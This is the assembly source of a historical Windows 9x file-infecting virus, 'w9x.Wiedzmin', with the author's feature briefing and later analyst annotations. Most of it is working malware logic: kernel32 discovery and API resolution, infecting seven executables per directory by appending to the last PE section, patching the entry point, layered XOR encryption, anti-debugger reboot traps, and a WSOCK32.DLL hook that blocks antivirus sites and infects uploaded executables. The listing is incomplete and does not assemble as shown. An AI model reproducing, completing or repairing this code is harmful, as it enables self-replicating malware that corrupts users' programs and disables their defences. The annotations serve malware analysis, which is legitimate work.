; W D nnn
; WW Ww o D M O Nn nn
; Ww wW i eEeE dddDD ZzzZzZ Mm m m nN nn
; wW Ww ii e E d dD Zz m M M mm ii N n n
; Ww w wW ii Eeee d dD z mm m m i n N n
; W W W W ii e d dD z m mm ii n n n
; wWw wWwW iii eEee d dD zZzZzZ mm mm ii n nn
; ddddDd mm iii n n
; -- Briefing --
; Virus name : w9x.Wiedzmin
; Virus version : 1.0
; Virus author : Lord YuP - Deithwen Addan
; Release date : 6.02.02, revised 8.02.02 (the SEH handler was added in the revision)
; Virus type : PE infector and WSOCK32.DLL hooker
; Target Systems : win95 [nt], win98 [nt], winME [t]
; [nt] - not tested (expected to work, unverified)
; [t] - tested
; Layer 1 - encrypts the main virus body
; Layer 2 - encrypts the host body (the section holding the entry point)
; Layer 3 - encrypts the virus data (strings)
; Every layer is encrypted with a different key.
; Virus helper : When the section holding the entry point (EIP must
; point into it) is named something other than ".text"
; or "CODE", the virus encrypts the host body and places
; only a decryptor stub in the last section. The encrypted
; body (possibly including another virus) uses a random
; key. EIP points to the stub.
; Polymorphic : Only in a weak sense: a random XOR key plus 0-255
; bytes of NOP (90h) padding in front of the body; the
; decryptor code itself is fixed and the key is stored
; in the clear next to it.
; AntiAV : Files whose name starts with 'a','A','E','e','v','V'
; are not infected.
; AntiDEBUG : Yes - Win9x SoftICE detection (opening \\.\SICE) and
; the IsDebuggerPresent API. When SoftICE is found it
; prints a message to the debugger and executes int 19h;
; other debuggers (td32, SoftSnoop and so on) also get
; int 19h. Note: the call to the trap is commented out in
; this build, so it never runs.
; WSOCK32 hooker : The virus infects a copy of wsock32.dll, replacing the
; send and connect export addresses. After a reboot (via
; a wininit.ini [rename] entry) the functions are hooked:
; connect() to an address in a fixed table of AV-vendor
; /24 prefixes fails (error: host not found), and when
; the user uploads an .exe to an FTP account the virus
; infects it on the fly.
; Infection process : The virus infects 7 files in the local directory
; and 7 files in the Windows directory, appending
; itself to the last section, which is enlarged.
; EIP points to it.
; Payload : On 22.06 or 22.12, on every run, it prints a coloured
; string in an infinite loop. The string is visible
; everywhere because the virus draws on the desktop
; window's DC.
; NOTE(review): this listing is incomplete. Lines consisting of a single
; token (bare labels such as v_start/@EXIT/@infect, `ret`, `stosd`,
; `lodsb`, `pushad`, `endm`, `ends`) appear to have been lost in
; extraction, so branch targets do not resolve and the text does not
; assemble as shown. Historical Win9x-only sample, annotated for
; analysis only and otherwise left unchanged.
.model flat
; NOTE(review): 32-bit x86, MASM/TASM syntax (Intel operand order). The
; annotations in this file are analyst notes; the code is reproduced as
; found. Lines consisting of a single token (bare labels, `ret`, `stosd`,
; `lodsb`, `pushad`, `popad`, `endm`, `ends`) appear to have been lost in
; extraction, so many branch targets below do not resolve.
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
; The fields below resemble a hand-written WIN32_FIND_DATA layout
; (attributes, FILETIMEs, sizes, reserved, cFileName[260],
; cAlternateFileName[14]) - presumably the body of the WIN32_FIND_DATA
; struc used by `finddata` further down, with its struc/ends lines lost.
; An extra FILETIME pair precedes dwFileAttributes, which does not match
; the SDK layout - TODO confirm field offsets against the full source.
dwLowDateTime dd ?
dwHighDateTime dd ?
dwFileAttributes dd 0
dwLowDateTime0 dd ?
dwHigDateTime0 dd ?
dwLowDateTime1 dd ?
dwHigDateTime1 dd ?
dwLowDateTime2 dd ?
dwHigDateTime2 dd ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved dd 0,0
cFileName db 260 dup(0)
cAlternateFilename db 14 dup(0)
db 2 dup(0) ; padding
; Size constants. hooksize/sendh/connecth describe the relocatable WSOCK32
; hook (start_h..hook_end); vvsize is the scratch data area that follows
; the body; virussize is the body proper; TO_DE is the byte count covered
; by the main decryptor; helper is the size of the host-decryptor stub
; (@uncrypt..@helper_end).
hooksize equ hook_end-start_h
sendh equ (offset hooked_send-offset start_h)
connecth equ (offset hooked_connect-offset start_h)
vvsize equ HeapEnd-HeapStart
virussize equ VirusEnd-v_start
allsize equ virussize
TO_DE equ @loop_decryptt-@to_this
helper equ @helper_end-@uncrypt
; Emits virussize as five ASCII decimal digits (intended for the
; first-generation message). The closing `endm` is not visible here.
virussizee macro
db virussize/10000 mod 10 + "0"
db virussize/01000 mod 10 + "0"
db virussize/00100 mod 10 + "0"
db virussize/00010 mod 10 + "0"
db virussize/00001 mod 10 + "0"
db ?
; --- Entry / main decryptor ----------------------------------------------
; Compute the load delta into ebp, then XOR-decrypt the region
; @to_this..@loop_decryptt in place with the low byte of key_main. This
; same code is also called as a subroutine by @crypt_my_body (with
; edi = 'YUP!') to restore the body after it was encrypted for writing.
call @delta ; (target label not visible in this listing)
pop ebp ;ebp contains address of @delta right now in
sub ebp,offset @delta ;memory -> we must sub the linking @delta val
cmp ebp,0 ; first-generation test; no conditional branch on it is visible here (flags are clobbered by the xor below)
lea edx,[ebp+offset @to_this] ; edx -> start of the encrypted region
mov eax,[ebp+key_main] ; key_main sits unencrypted right after the decryptor
mov ecx,TO_DE ; bytes to decrypt
xor byte ptr [edx],al ; single-byte XOR: only the low byte of the key is ever used
inc edx
loop @loop_decrypt ; (loop label not visible)
cmp edi,'!PUY' ; 'YUP!' tag: set by @crypt_my_body when it re-enters here to undo its encryption
jne @to_this ; normal entry: continue into the now-decrypted body (a `ret` for the tagged case is presumably lost)
; Leftover pointer setup: edi/esi are overwritten before use.
lea edi,[ebp+offset APIList]
lea esi,[ebp+offset APIList]
lea edi,[ebp+offset TO_CRYPT_DATA]
lea esi,[ebp+offset TO_CRYPT_DATA]
; Install an SEH frame so that an access violation (e.g. probing an
; unmapped kernel32 address on NT) lands in `fault`, which unwinds to
; the exit path and hands control back to the host.
lea eax, [ebp+fault] ; Setup a SEH frame
push eax
push dword ptr fs:[0]
mov fs:[0], esp
; Locate kernel32 by probing hard-coded Win9x image bases. This is what
; limits the sample to 9x. The conditional branch after the first probe is
; not visible here (possibly a lost line).
mov eax,0BFF70000h ; kernel32 base on Win95/98
cmp word ptr [eax],'ZM'
; NT: maybe later
mov eax,0BFF60000h ; kernel32 base on WinME
cmp word ptr [eax],'ZM' ; check for an MZ header
jmp @EXIT ; (target label not visible)
; capis selects which export name is searched below:
; 5 = "GetProcAddress" in kernel32; 0 = "send", 1 = "connect" in the
; mapped WSOCK32 copy (hook mode, go_wsock=1).
mov dword ptr [ebp+capis],5h
mov dword ptr [ebp+Kernel],eax
mov dword ptr [ebp+NON],000000h
mov dword ptr [ebp + AOF],000000h
mov dword ptr [ebp + AON],000000h
mov dword ptr [ebp + AOO],000000h
; @go_export (label not visible): walk the export directory of the image
; at eax. RVAs are added to eax directly, which is correct for a loaded
; image; in hook mode eax is a *file mapping* (wsock_h), so this only
; works when the DLL's raw offsets equal its RVAs - TODO confirm.
mov edx,eax
mov ebx,edx
mov edi, [eax + 03ch] ; e_lfanew: a valid PE ?
add edx, edi
cmp dword ptr [edx],'EP'
jne @EXIT
mov edx,[edx + 078h] ; DataDirectory[0]: export table RVA
add edx,eax ; edx -> export table
mov esi,[edx + 018h] ; NumberOfNames
mov dword ptr [ebp + NON],esi
mov esi,[edx+1Ch] ; AddressOfFunctions
mov dword ptr [ebp + AOF],esi
add dword ptr [ebp + AOF],eax
mov esi,[edx+20h] ; AddressOfNames
mov dword ptr [ebp + AON],esi
add dword ptr [ebp + AON],eax
mov esi,[edx+24h] ; AddressOfNameOrdinals
mov dword ptr [ebp + AOO],esi
add dword ptr [ebp + AOO],eax
mov esi,dword ptr [ebp + AON]
mov [ebp+offset IndexA],esi ;save into naming index
mov esi,dword ptr [esi]
add esi,eax ; esi -> first exported name
xor ebx,ebx ; ebx = name index
; Pick the name to compare against (see capis above).
cmp dword ptr [ebp+capis],5h
je @zwykle
lea edi,[ebp+offset A1] ; "send"
mov ecx,A1s
cmp dword ptr [ebp+capis],1
jne @porownaj
lea edi,[ebp+offset A2] ; "connect"
mov ecx,A2s
jmp @porownaj
lea edi,[ebp + offset APIS] ; edi -> "GetProcAddress"
mov ecx,APIS_SIZE ;size api
rep cmpsb ;scan
je found ;if equal calculate function address
add dword ptr [ebp + offset IndexA],4 ; next AddressOfNames entry
mov esi,[ebp + offset IndexA]
mov esi,[esi]
add esi,eax
cmp dword ptr [ebp+offset NON],ebx ; out of names: give up
je @EXIT
inc ebx
cmp dword ptr [ebp+offset NON],ebx
je @EXIT
jmp @__GPA
; found: ebx = index into AddressOfNameOrdinals.
mov eax,ebx ; found it
mov ecx,edi
inc ecx
push ecx ; save ecx
mov eax,ebx ;EAX=>counter
mov ecx,2
mul ecx ; index * sizeof(WORD)
pop ecx ; restore ecx
mov esi,[ebp + AOO]
add esi,eax
xor eax,eax
mov ax,word ptr [esi] ; ordinal
mov ecx,4
mul ecx ; ordinal * sizeof(DWORD) -> offset into AddressOfFunctions
cmp dword ptr [ebp+go_wsock],1
jne @skip_it_urgh ; normal resolution
; Hook mode: overwrite the Export Address Table entry for send/connect in
; the mapped WZZOCK32.dll copy with moj_address + hook offset.
; moj_address is the raw file offset at which the hook was appended (set
; in @infect); an EAT entry is an RVA, so this is only correct when
; PointerToRawData equals VirtualAddress for that section - TODO confirm.
mov esi,[ebp + AOF]
add esi,eax
mov eax,[esi]
cmp dword ptr [ebp+capis],1
je @make_1
;mov ebx,dword ptr [ebp+wsock_hh]
;mov dword ptr [ebp+a_send],eax
;add dword ptr [ebp+a_send],ebx
;mov eax,dword ptr [ebp+a_send]
mov ebx,sendh
mov edx,dword ptr [ebp+moj_address] ; file offset of the appended hook
add edx,ebx
jmp make_real
mov ebx,connecth
mov edx,dword ptr [ebp+moj_address] ; file offset of the appended hook
add edx,ebx
mov [esi],edx ; patch the EAT entry in the file mapping
inc dword ptr [ebp+capis]
cmp dword ptr [ebp+capis],2
je @go_out_now ; both send and connect patched
mov eax,dword ptr [ebp+wsock_h] ; rescan the mapped DLL for the next name
jmp @go_export
@go_out_now: ret
; Normal mode: GetProcAddress = kernel32 base + RVA from AddressOfFunctions.
mov esi,[ebp + AOF]
add esi,eax
mov edi,dword ptr [esi]
add edi,[ebp+offset Kernel]
mov eax,edi
mov dword ptr [ebp+_GPA],eax
@GET_APIS: ;API Search
; Resolve every name in APIList via GetProcAddress(kernel32) into the
; parallel APIListA dword table at edi. The `stosd` that stores eax is
; not visible (likely a lost single-token line). The list ends with 07h.
xor esi,esi
lea esi,[ebp+offset APIList]
lea edi,[ebp+offset _FindFirstFileA]
; results are dwords, so edi advances 4 bytes per name
; (stosd: EAX -> [EDI])
push esi
push dword ptr [ebp+offset Kernel]
call dword ptr [ebp+offset _GPA]
inc esi ; advance to the NUL that ends this name
cmp byte ptr [esi],00h
jne @next_byte
inc esi ; first byte of the next name
cmp byte ptr [esi],07h ; 07h terminates the list
jne @go_table
; Copy the two kernel32 pointers the WSOCK32 hook needs into the hook's
; own data area (gcd/wex travel with the relocatable hook).
mov eax,dword ptr [ebp+_GetCurrentDirectoryA]
mov dword ptr [ebp+gcd],eax
mov eax,dword ptr [ebp+_WinExec]
mov dword ptr [ebp+wex],eax
lea eax,[ebp+offset wsock]
inc eax ; skip the leading '\' of "\WSOCK32.dll"
push eax
call dword ptr [ebp+_LoadLibraryA]
mov dword ptr [ebp+wsock_hh],eax ; no NULL check: a failed load just makes the lookups below fail
lea ecx,[ebp+offset sle]
push ecx
push eax
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+_WSASetLastError],eax
lea ecx,[ebp+offset A1]
push ecx
push dword ptr [ebp+wsock_hh]
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_send],eax ; original send, stored inside the hook data
lea ecx,[ebp+offset A2]
push ecx
push dword ptr [ebp+wsock_hh]
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_connect],eax ; original connect, stored inside the hook data
; VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect): only three
; arguments are pushed in the visible lines (flProtect is missing), so
; the call would be off by one dword unless a push was lost in extraction.
push 1000h ; MEM_COMMIT
push 1000 ; size of buffer
push 0 ; lpAddress
call dword ptr [ebp+_VirtualAlloc] ; Alloc IT!
mov dword ptr [ebp+vbuf],eax
;********************************DEBUG TRAP******************************************************
;call @debug_trap
; The anti-debug trap above is compiled in but never called.
call @wsockz ; install the WSOCK32 hook (copy, patch exports, WININIT.INI rename)
mov dword ptr [ebp+go_wsock],0
; Payload trigger: 22 June or 22 December (system time, not local time).
; make_it_real never returns (endless drawing loop), so the second check
; is only reached when the first does not match.
lea eax,[ebp+SYSTEM_TIME]
push eax
call dword ptr [ebp+_GetSystemTime]
cmp word ptr [ebp+wMonth],6 ;22.06 Midaëte
jne try_
cmp word ptr [ebp+wDay],22
jne try_
call make_it_real
cmp word ptr [ebp+wMonth],12 ;22.12 Midinvaerne
jne cya_folx
cmp word ptr [ebp+wDay],22
jne cya_folx
call make_it_real
call @GGEN_KEY ; key/key2 = GetTickCount mod 55h (see the key generator below)
lea edi,[ebp+offset APIList] ; leftover pointer setup, overwritten below
lea esi,[ebp+offset APIList]
lea edi,[ebp+offset TO_CRYPT_DATA]
lea esi,[ebp+offset TO_CRYPT_DATA]
; Command-line mode. When started by the WSOCK32 send hook as
; "<santa> <path>", the text after the first space is copied into
; finddata.cFileName (the lodsb/stosb of the copy loop are not visible),
; checked for a '.' four characters before the end (an extension), and
; that single file is infected before the process exits.
lea edi,[ebp+finddata.cFileName]
call dword ptr [ebp+_GetCommandLineA]
mov esi,eax
xor ebx,ebx ; ebx = argument length (appears to include the NUL)
cmp al,0
je @GetWDir ; no argument: fall through to directory infection
cmp al,' '
je _ave_it
jmp _skip_space
inc ebx
cmp al,0
je @infect_shit
jmp _ave_it
cmp ebx,4
jl @GetWDir ; too short for "x.ext"
lea esi,[ebp+offset finddata.cFileName]
add esi,ebx
sub esi,5 ; -> expected position of the '.' in ".ext"
cmp al,'.'
je yep_it
jmp @GetWDir
; Preserve the per-file state around @infect, then exit: this process is
; the dropped copy, there is no host to return to.
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
push 0h
call dword ptr [ebp+_ExitProcess]
; Directory infection (@GetWDir, label not visible): up to 7 matching
; files in the start directory, then up to 7 more in the Windows
; directory. Stdcall arguments are pushed right to left:
; GetWindowsDirectoryA(winDIR, 260), GetCurrentDirectoryA(560, oldDIR).
lea eax,[ebp+offset winDIR]
push 260
push eax
call dword ptr [ebp+_GetWindowsDirectoryA]
;now local dir
lea eax,[ebp+offset oldDIR]
push eax
push 560
call dword ptr [ebp+_GetCurrentDirectoryA]
mov dword ptr [ebp+was_win],0000000h ; 0 = still in the start directory
mov dword ptr [ebp+ic],0000000h ; infections done in this directory
lea eax,[ebp+offset finddata]
push eax
lea eax,[ebp+offset marker] ; search mask (this build: "sru.exe")
push eax
call dword ptr [ebp+_FindFirstFileA]
mov dword ptr [ebp+sHnd],eax
inc eax
jz @d_dalej ; INVALID_HANDLE_VALUE: nothing matched
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
; @@Fnext (label not visible): next match, same state preservation.
lea eax,[ebp+offset finddata]
push eax
push dword ptr [ebp+offset sHnd]
call dword ptr [ebp+_FindNextFileA]
cmp eax,0
je @d_dalej
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
cmp dword ptr [ebp+ic],7 ; stop after 7 infections per directory
jne @@Fnext
cmp dword ptr [ebp+was_win],0
jne @dalej
cmp dword ptr [ebp+was_win],0
jne _stepnext
; Switch to the Windows directory once and restart the search there.
lea eax,[ebp+offset winDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]
mov dword ptr [ebp+ic],0000000h
mov dword ptr [ebp+was_win],1
push dword ptr [ebp+sHnd]
call dword ptr [ebp+_FindClose]
cmp dword ptr [ebp+ic],7
jne @Find1st
lea eax,[ebp+offset oldDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]
jmp @EXIT
; `fault` SEH handler (label not visible): [esp+8] is the EstablisherFrame,
; i.e. the esp saved by `mov fs:[0],esp`, so this throws away the
; dispatcher frames and falls straight into the @EXIT cleanup. ebp is
; assumed to survive exception dispatch - TODO confirm that holds on 9x.
mov esp, [esp+8]
; @EXIT (label not visible): VirtualFree(vbuf, 1000, MEM_DECOMMIT) -
; decommit only, the reservation is never released - then pop the SEH frame.
push 4000h
push 1000
push dword ptr [ebp+vbuf]
call dword ptr [ebp+_VirtualFree]
pop dword ptr fs:[0]
add esp, 4
cmp ebp,0 ;first GeneratioN?
jne _ETH ; infected host: skip the first-generation message (target not visible)
call fakehost ; first generation: message box and exit
call @uncrypt
; Return to host: ImageBase + original entry RVA. Assumes the image is
; loaded at its preferred base (no relocation handling).
call @gd
@gd: pop ebp
sub ebp,offset @gd
mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]
jmp eax
Kernel dd 0 ; kernel32 base found by the start-up probe
; --- @infect (label not visible) ------------------------------------------
; Infect the file named in finddata.cFileName. State contract inferred from
; the callers: go_wsock=1 appends the WSOCK32 hook instead of the body and
; leaves the entry point alone; help_virus=1 (set by @crypt_host) diverts
; to the helper-stub path. The failure path sets edx=-1.
call @bad_name ; edi=1 when the name starts with a/A/e/E/v/V
cmp edi,1
jne _continue
; NOTE(review): as shown, a "bad" name falls through into the open below;
; a bare `ret`/`jmp` line has presumably been lost here.
lea esi,[ebp+offset finddata.cFileName]
push esi
call dword ptr [ebp+_GetFileAttributesA]
mov dword ptr [ebp+fileAtrib],eax ; saved so they can be restored afterwards
inc eax
jz _Out ; INVALID_FILE_ATTRIBUTES
; Save the file times so they can be put back after infection.
; NOTE(review): fHnd is never assigned in the visible code (CreateFileA
; stores into fileHandle), so GetFileTime/SetFileTime likely operate on
; a stale handle and the timestamp restore does not work.
lea eax,[ebp+F1]
push eax
lea eax,[ebp+F2]
push eax
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_GetFileTime]
push 00000080h ; FILE_ATTRIBUTE_NORMAL: clear read-only/hidden/system
push esi
call dword ptr [_SetFileAttributesA+ebp] ; clean file
cmp eax,0
je _Out
;mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
;mov [ebp+offset memory],ecx
; open the file to obtain a handle
xor eax,eax
lea esi,[ebp+offset finddata.cFileName]
push eax ; hTemplateFile
push 00000080h ; FILE_ATTRIBUTE_NORMAL
push 00000003h ; OPEN_EXISTING
push eax ; lpSecurityAttributes
push eax ; dwShareMode = 0 (exclusive)
push 80000000h OR 40000000h ; GENERIC_READ | GENERIC_WRITE
push esi
call dword ptr [ebp+_CreateFileA]
mov edi,eax ; edi = handle
inc eax
jz _Out ; INVALID_HANDLE_VALUE
dec eax
mov dword ptr [ebp+offset fileHandle],eax
push 0
push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_GetFileSize]
mov dword ptr [ebp+fSize],eax
inc eax
jz _Out2 ; INVALID_FILE_SIZE
dec eax
mov dword ptr [ebp+finddata.nFileSizeLow],eax ; original size, used to truncate on failure
mov ecx,dword ptr [ebp+fSize]
call MapF ; CreateFileMappingA(fileHandle, PAGE_READWRITE, size)
mov ecx,dword ptr [ebp+fSize]
call VMapF ; MapViewOfFile -> esi / fMapReal
; esi = file mapping, walked like the kernel image above.
; NOTE(review): e_lfanew is used unchecked; an oversized value reads past
; the mapping (the SEH frame would catch the fault).
cmp word ptr [esi],'ZM'
jne _Out3
mov ecx,[esi+3ch]
cmp dword ptr [esi+ecx],'EP'
jne _Out3
add esi,ecx ;ESI => PE HEADER
mov edi,esi
mov dword ptr [ebp+header],esi
mov ecx,[esi+28h] ; AddressOfEntryPoint
mov dword ptr [ebp+hosteip],ecx
mov ecx,[esi+3ch] ; FileAlignment
mov dword ptr [ebp+align],ecx
mov ecx,[esi+34h] ; ImageBase
mov dword ptr [ebp+imagebase],ecx
mov ecx,[esi+38h] ;get section align value
mov [ebp + _secAlign],ecx ;and save it (not used anywhere visible)
cmp dword ptr [esi+4ch],"deiW" ; infection marker "Wied" in Win32VersionValue
jz _No_infect
push dword ptr [esi+3Ch] ; FileAlignment, popped into ecx for Align_ below
mov eax,[ebp+offset fMapReal]
push eax
mov eax, [ebp+_UnmapViewOfFile]
call eax
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
;mov eax,dword ptr [ebp+go_wsock]
mov eax,dword ptr [ebp+fSize] ; And Map all again.
cmp dword ptr [ebp+go_wsock],1
je @dodaj
add eax,virussize+vvsize ; grow by body + scratch area
;add eax,vvsize
jmp @nextt
@dodaj:add eax,hooksize ; hook mode: grow by the hook only
pop ecx
call Align_ ; round up to FileAlignment (see the Align_ quirk)
mov dword ptr [ebp+memory],eax
mov ecx,eax
call MapF ; re-map at the grown size (this extends the file)
mov ecx,dword ptr [ebp+memory]
call VMapF
cmp dword ptr [ebp+go_wsock],1
je @0dal
call @crypt_host ; layer 2: encrypt the host's entry section
cmp dword ptr [ebp+help_virus],1
je _God ; entry section not .text/CODE: helper-stub path instead
; Locate the last section header:
; PE + 78h + NumberOfRvaAndSizes*8 + (NumberOfSections-1)*28h
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
inc dword ptr [ebp+ic] ; count this infection
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,28h ;28 bytes for each section header
dec eax ;seeking for last,...
mul ecx ;and mul it
add esi,eax ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = number of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to last section
mov edx,[esi+10h] ; EDX = SizeOfRawData
mov ebx,edx ; EBX = EDX
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
push edx ; Preserve EDX
mov eax,ebx ; EAX = EBX
add eax,[esi+0Ch] ; EAX = EAX+VA Address
; EAX = New EIP
;mov [edi+28h],eax ; Change the new EIP
mov dword ptr [ebp+NewEIP],eax ; Also store it
cmp dword ptr [ebp+go_wsock],1
je @infect_then ; hook mode: keep the DLL entry point
mov eax,dword ptr [ebp+NewEIP]
mov [edi+28h],eax ; entry point -> appended body
mov eax,[esi+10h] ; EAX = new SizeOfRawData
cmp dword ptr [ebp+go_wsock],1
je @dallejj
add eax,vvsize+virussize ; EAX = EAX+VirusSize
jmp @nexttt
@dallejj: add eax,hooksize
mov ecx,[edi+3Ch] ; ECX = FileAlignment
call Align_ ; Align!
mov [esi+10h],eax ; New SizeOfRawData
mov [esi+08h],eax ; New VirtualSize (file-aligned, not section-aligned)
pop edx ; EDX = Raw pointer to the
; end of section
cmp dword ptr [ebp+go_wsock],1
je @skip_thiss
mov eax,[esi+10h] ; EAX = New SizeOfRawData
add eax,[esi+0Ch] ; EAX = EAX+VirtualAddress
mov [edi+50h],eax ; New SizeOfImage - not rounded to SectionAlignment; strict loaders reject this
or dword ptr [esi+24h],0A0000020h ; section flags |= WRITE | EXECUTE | CNT_CODE
mov dword ptr [edi+4ch],"deiW" ;Wiedzmin here ;) - infection marker
lea esi,[ebp+v_start] ; ESI = Ptr to virus_start
xchg edi,edx ; EDI = Raw ptr after last
mov dword ptr [ebp+moj_address],edi ; raw file offset of the appended data (the EAT patch later uses it as an RVA)
; section
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
mov ecx,virussize ;ECX = Size to copy
cmp dword ptr [ebp+go_wsock],1
jne @write_it
mov ecx,hooksize
lea esi,[ebp+start_h] ; hook mode: copy the relocatable hook instead
cmp dword ptr [ebp+go_wsock],1
je step_0
call @crypt_my_body ; layer 1: NOP padding + body encrypted with key_main
jmp step_1
step_0: rep movsb ;Do it!
cmp dword ptr [ebp+go_wsock],1
jne _Git
jmp _God
; Failure path: flag edx=-1 (hook mode) or truncate the file back to its
; original size and undo the infection count.
cmp dword ptr [ebp+go_wsock],1
jne @zw
mov edx,-1
jmp _God
mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
call @zostaf ; SetFilePointer + SetEndOfFile to the original size
dec dword ptr [ebp+ic]
; _God (label not visible): unmap, restore times, close, then copy the
; now-infected file to the `santa` path (fail if it already exists) and
; put the original attributes back.
mov eax,[ebp+offset fMapReal]
push eax
mov eax, [ebp+_UnmapViewOfFile]
call eax
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
lea eax,[ebp+F1]
push eax
lea eax,[ebp+F2]
push eax
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd] ; see the fHnd note above
call dword ptr [ebp+_SetFileTime]
push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_CloseHandle]
cmp dword ptr [ebp+go_wsock],1
je @@@z
push 1 ; bFailIfExists
lea eax,[ebp+santa]
push eax
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_CopyFileA] ; CopyFileA(cFileName, santa, TRUE)
;restore the attributes
push dword ptr [ebp+fileAtrib]
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_SetFileAttributesA]
; Align_ (label not visible): eax = eax rounded up to a multiple of ecx.
; Where @infect ends and Align_ begins is not visible - a `ret` may have
; been lost between `mov edx,-1` and `push edx`.
; Quirk: the remainder is not special-cased, so an already-aligned value
; grows by one full unit; a zero FileAlignment in a malformed header
; would fault on `div`.
mov edx,-1
push edx
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx ; ecx = alignment - remainder
add eax,ecx
pop edx
; @zostaf (label not visible): SetFilePointer(fileHandle, ecx, NULL,
; FILE_BEGIN) followed by SetEndOfFile - truncates or extends the file
; to exactly ecx bytes. The trailing `ret` is not visible.
xor eax,eax
push eax ; FILE_BEGIN
push eax ; lpDistanceToMoveHigh
push ecx
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetFilePointer]
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetEndOfFile]
;ECX - size to map
; MapF (label not visible): CreateFileMappingA(fileHandle, NULL,
; PAGE_READWRITE, 0, ecx, NULL) -> fHndMap. A size larger than the file
; extends the file on disk.
xor eax,eax
push eax ; lpName
push ecx ; dwMaximumSizeLow
push eax ; dwMaximumSizeHigh
push 00000004h ; PAGE_READWRITE
push eax ; lpAttributes
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+_CreateFileMappingA]
cmp eax,0
je _Out2
mov dword ptr [ebp+fHndMap],eax
; VMapF (label not visible): MapViewOfFile(fHndMap, FILE_MAP_READ |
; FILE_MAP_WRITE, 0, 0, ecx) -> fMapReal and esi. The `ret` lines that
; separate MapF and VMapF are not visible.
xor eax,eax
push ecx ; dwNumberOfBytesToMap
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_MapViewOfFile]
cmp eax,0
je _Out3
mov dword ptr [ebp+fMapReal],eax
mov esi,eax
@debug_trap: ;ret
; Never reached: the only call site is commented out at start-up.
; IsDebuggerPresent -> int 19h. Then a Win9x SoftICE check: if the
; \\.\SICE device opens, taunt via OutputDebugStringA and int 19h.
; `mov eax,909119cdh` followed by `jmp $-4` jumps into the immediate
; bytes CD 19 90 90, i.e. executes `int 19h; nop; nop` (the BIOS
; bootstrap vector - a reboot attempt on 9x).
call dword ptr [ebp+_IsDebuggerPresent]
or eax,eax
jz _leave_me
ble: mov eax, 909119cdh ;int 19h!
jmp $ - 4
lea eax,[ebp+sice9x]
push 00000000h ; hTemplateFile
push 00000080h ; FILE_ATTRIBUTE_NORMAL
push 00000003h ; OPEN_EXISTING
push 00000000h ; lpSecurityAttributes
push 00000001h ; FILE_SHARE_READ
push 0C0000000h ; GENERIC_READ | GENERIC_WRITE
push eax
call dword ptr [ebp+_CreateFileA]
inc eax
jz leave_it ; INVALID_HANDLE_VALUE: no SoftICE
dec eax
push eax
call dword ptr [ebp+_CloseHandle]
lea eax,[ebp+to_ja]
push eax
call dword ptr [ebp+_OutputDebugStringA]
mov eax, 909119cdh ;int 19h!
jmp $ - 4
jmp @EXIT
leave_it: ret
;PayL0ad ;]
;this is very simple because I didn't have time to make it perfect
; Payload state: current text position, desktop window/DC, screen size,
; font handle and the four text colours cycled through (COLORREF values).
p_x dd 0
p_y dd 0
hdc dd 0
wh dd 0
screen_x dd 0
screen_y dd 0
font dd 0
color: dd 15466513
dd 15474944
dd 15484928
dd 15496448
; make_it_real (label not visible): resolve the names in @GDI_APIZ into
; @GDI_APIZA - GDI32 first, switching to USER32 at the 77h separator and
; stopping at 69h (the `stosd` per name is not visible) - then draw the
; logo on the desktop window DC in an endless loop.
lea esi,[ebp+@GDI_APIZ]
lea edi,[ebp+@GDI_APIZA]
lea ebx,[ebp+gdi32]
push ebx
call dword ptr [ebp+_LoadLibraryA]
mov ebx,eax ; module handle currently being searched
push esi
push ebx
